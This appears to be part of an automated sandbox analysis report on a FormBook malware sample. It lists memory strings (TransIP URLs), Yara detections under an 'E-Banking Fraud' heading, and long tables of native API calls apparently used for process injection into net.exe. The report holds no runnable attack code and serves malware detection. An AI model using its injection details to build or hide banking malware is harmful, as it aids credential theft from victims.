                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/terms-of-service/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/algemene-voorwaarden/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/knowledgebase/zoeken/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/privacy-policy/
                Source: TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/services/search-domains/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000534/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000572
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000580/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/198/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2639564643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2697225116.0000000005DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4655930930.0000000004B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4647930046.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4653755949.0000000004880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2641308327.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4645931849.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4643912101.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0042C713 NtClose,4_2_0042C713
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882B60 NtClose,LdrInitializeThunk,4_2_01882B60
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01882DF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01882C70
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018835C0 NtCreateMutant,LdrInitializeThunk,4_2_018835C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01884340 NtSetContextThread,4_2_01884340
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01884650 NtSuspendThread,4_2_01884650
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882B80 NtQueryInformationFile,4_2_01882B80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882BA0 NtEnumerateValueKey,4_2_01882BA0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882BE0 NtQueryValueKey,4_2_01882BE0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882BF0 NtAllocateVirtualMemory,4_2_01882BF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882AB0 NtWaitForSingleObject,4_2_01882AB0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882AD0 NtReadFile,4_2_01882AD0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882AF0 NtWriteFile,4_2_01882AF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882DB0 NtEnumerateKey,4_2_01882DB0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882DD0 NtDelayExecution,4_2_01882DD0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882D00 NtSetInformationFile,4_2_01882D00
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882D10 NtMapViewOfSection,4_2_01882D10
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882D30 NtUnmapViewOfSection,4_2_01882D30
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882CA0 NtQueryInformationToken,4_2_01882CA0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882CC0 NtQueryVirtualMemory,4_2_01882CC0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882CF0 NtOpenProcess,4_2_01882CF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882C00 NtQueryInformationProcess,4_2_01882C00
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882C60 NtCreateKey,4_2_01882C60
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882F90 NtProtectVirtualMemory,4_2_01882F90
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882FA0 NtQuerySection,4_2_01882FA0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882FB0 NtResumeThread,4_2_01882FB0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882FE0 NtCreateFile,4_2_01882FE0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882F30 NtCreateSection,4_2_01882F30
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882F60 NtCreateProcessEx,4_2_01882F60
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882E80 NtReadVirtualMemory,4_2_01882E80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882EA0 NtAdjustPrivilegesToken,4_2_01882EA0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882EE0 NtQueueApcThread,4_2_01882EE0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882E30 NtWriteVirtualMemory,4_2_01882E30
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01883090 NtSetValueKey,4_2_01883090
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01883010 NtOpenDirectoryObject,4_2_01883010
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018839B0 NtGetContextThread,4_2_018839B0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01883D10 NtOpenProcessToken,4_2_01883D10
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01883D70 NtOpenThread,4_2_01883D70
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03094340 NtSetContextThread,LdrInitializeThunk,11_2_03094340
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03094650 NtSuspendThread,LdrInitializeThunk,11_2_03094650
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092B60 NtClose,LdrInitializeThunk,11_2_03092B60
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_03092BA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092BE0 NtQueryValueKey,LdrInitializeThunk,11_2_03092BE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03092BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092AD0 NtReadFile,LdrInitializeThunk,11_2_03092AD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092AF0 NtWriteFile,LdrInitializeThunk,11_2_03092AF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092F30 NtCreateSection,LdrInitializeThunk,11_2_03092F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092FB0 NtResumeThread,LdrInitializeThunk,11_2_03092FB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092FE0 NtCreateFile,LdrInitializeThunk,11_2_03092FE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_03092E80
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092EE0 NtQueueApcThread,LdrInitializeThunk,11_2_03092EE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092D10 NtMapViewOfSection,LdrInitializeThunk,11_2_03092D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_03092D30
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092DD0 NtDelayExecution,LdrInitializeThunk,11_2_03092DD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_03092DF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092C60 NtCreateKey,LdrInitializeThunk,11_2_03092C60
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_03092C70
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_03092CA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030935C0 NtCreateMutant,LdrInitializeThunk,11_2_030935C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030939B0 NtGetContextThread,LdrInitializeThunk,11_2_030939B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092B80 NtQueryInformationFile,11_2_03092B80
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092AB0 NtWaitForSingleObject,11_2_03092AB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092F60 NtCreateProcessEx,11_2_03092F60
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092F90 NtProtectVirtualMemory,11_2_03092F90
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092FA0 NtQuerySection,11_2_03092FA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092E30 NtWriteVirtualMemory,11_2_03092E30
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092EA0 NtAdjustPrivilegesToken,11_2_03092EA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092D00 NtSetInformationFile,11_2_03092D00
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092DB0 NtEnumerateKey,11_2_03092DB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092C00 NtQueryInformationProcess,11_2_03092C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092CC0 NtQueryVirtualMemory,11_2_03092CC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092CF0 NtOpenProcess,11_2_03092CF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03093010 NtOpenDirectoryObject,11_2_03093010
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03093090 NtSetValueKey,11_2_03093090
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03093D10 NtOpenProcessToken,11_2_03093D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03093D70 NtOpenThread,11_2_03093D70
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_02829270 NtCreateFile,11_2_02829270
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_028293D0 NtReadFile,11_2_028293D0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_028296D0 NtAllocateVirtualMemory,11_2_028296D0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_028294C0 NtDeleteFile,11_2_028294C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_02829560 NtClose,11_2_02829560
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_02E7F7E7 NtMapViewOfSection,11_2_02E7F7E7
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_02E7F9EE NtSetContextThread,11_2_02E7F9EE
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_051003D80_2_051003D8
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_05100D980_2_05100D98
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_05100D880_2_05100D88
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D42E780_2_06D42E78
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4C6380_2_06D4C638
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4B7280_2_06D4B728
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4A5080_2_06D4A508
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4AD280_2_06D4AD28
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D496190_2_06D49619
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D496280_2_06D49628
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4C62B0_2_06D4C62B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4E7800_2_06D4E780
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4E77E0_2_06D4E77E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4B7180_2_06D4B718
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4D4CB0_2_06D4D4CB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4A4F70_2_06D4A4F7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D445A10_2_06D445A1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4D5100_2_06D4D510
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4AD1B0_2_06D4AD1B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4D5030_2_06D4D503
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4E3510_2_06D4E351
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4EB700_2_06D4EB70
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4E3600_2_06D4E360
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4E8F00_2_06D4E8F0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4E8E80_2_06D4E8E8
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BA22700_2_09BA2270
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BA2F100_2_09BA2F10
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB7A4F0_2_09BB7A4F
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB4D700_2_09BB4D70
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB33F80_2_09BB33F8
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB38E00_2_09BB38E0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB38D00_2_09BB38D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB3B380_2_09BB3B38
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB3B280_2_09BB3B28
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BBCA400_2_09BBCA40
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB4D600_2_09BB4D60
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BBCE780_2_09BBCE78
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BBC1D00_2_09BBC1D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB00060_2_09BB0006
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB00400_2_09BB0040
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB33E80_2_09BB33E8
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BBE2800_2_09BBE280
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB52500_2_09BB5250
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB52410_2_09BB5241
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB36900_2_09BB3690
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB46900_2_09BB4690
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB36800_2_09BB3680
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BB46800_2_09BB4680
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_09BBC6080_2_09BBC608
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_004185E34_2_004185E3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_004010004_2_00401000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0040E1434_2_0040E143
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_004011604_2_00401160
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0040E13B4_2_0040E13B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_004023A04_2_004023A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_004014604_2_00401460
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0042ED434_2_0042ED43
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0040FDC34_2_0040FDC3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0040FDBA4_2_0040FDBA
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0040264C4_2_0040264C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_004026504_2_00402650
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_00402F304_2_00402F30
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0040FFE34_2_0040FFE3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_004167F34_2_004167F3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0040DFF34_2_0040DFF3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019041A24_2_019041A2
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019101AA4_2_019101AA
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019081CC4_2_019081CC
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018401004_2_01840100
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EA1184_2_018EA118
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D81584_2_018D8158
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E20004_2_018E2000
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E3F04_2_0185E3F0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019103E64_2_019103E6
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190A3524_2_0190A352
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D02C04_2_018D02C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F02744_2_018F0274
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019105914_2_01910591
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018505354_2_01850535
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018FE4F64_2_018FE4F6
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F44204_2_018F4420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019024464_2_01902446
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184C7C04_2_0184C7C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018747504_2_01874750
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018507704_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186C6E04_2_0186C6E0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018529A04_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0191A9A64_2_0191A9A6
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018669624_2_01866962
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018368B84_2_018368B8
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E8F04_2_0187E8F0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018528404_2_01852840
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185A8404_2_0185A840
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01906BD74_2_01906BD7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190AB404_2_0190AB40
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184EA804_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01868DBF4_2_01868DBF
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184ADE04_2_0184ADE0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185AD004_2_0185AD00
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018ECD1F4_2_018ECD1F
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F0CB54_2_018F0CB5
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01840CF24_2_01840CF2
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850C004_2_01850C00
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018CEFA04_2_018CEFA0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01842FC84_2_01842FC8
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185CFE04_2_0185CFE0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01892F284_2_01892F28
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01870F304_2_01870F30
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F2F304_2_018F2F30
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C4F404_2_018C4F40
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190CE934_2_0190CE93
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01862E904_2_01862E90
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190EEDB4_2_0190EEDB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190EE264_2_0190EE26
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850E594_2_01850E59
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185B1B04_2_0185B1B0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0188516C4_2_0188516C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183F1724_2_0183F172
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0191B16B4_2_0191B16B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018FF0CC4_2_018FF0CC
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018570C04_2_018570C0
